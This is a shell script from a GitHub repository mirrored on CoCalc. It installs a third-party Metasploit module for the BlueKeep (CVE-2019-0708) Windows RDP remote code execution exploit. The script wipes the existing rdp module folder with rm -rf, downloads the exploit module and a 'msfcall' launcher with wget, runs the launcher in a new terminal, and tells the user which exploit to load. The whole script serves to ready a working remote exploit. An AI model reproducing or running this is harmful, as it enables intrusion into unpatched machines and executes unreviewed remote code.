Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
nu11secur1ty
GitHub Repository: nu11secur1ty/Kali-Linux
Path: blob/master/BlueKeep/bk.sh
1303 views
1
#!/usr/bin/bash
2
# Author @nu11secur1ty
3
# WARNING: Do not edit this file!
4
5
cd /usr/share/metasploit-framework/modules/exploits/windows
6
rm -rf rdp
7
mkdir rdp && cd rdp
8
wget https://raw.githubusercontent.com/nu11secur1ty/Kali-Linux/master/BlueKeep/cve_2019_0708_bluekeep_rce/cve_2019_0708_bluekeep_rce.rb
9
cd /usr/share/metasploit-framework/
10
gem install bundler && bundle
11
cd $HOME
12
msfdb init
13
echo -e "\e[1;31mCopy and paste this command into your Metasploit session: (use exploit/windows/rdp/cve_2019_0708_bluekeep_rce)\e[0m"
14
wget https://raw.githubusercontent.com/nu11secur1ty/Kali-Linux/master/BlueKeep/msfcall
15
chmod a+x msfcall
16
gnome-terminal -e ./msfcall
17
sleep 3;
18
rm msfcall
19
exit 0;
20
21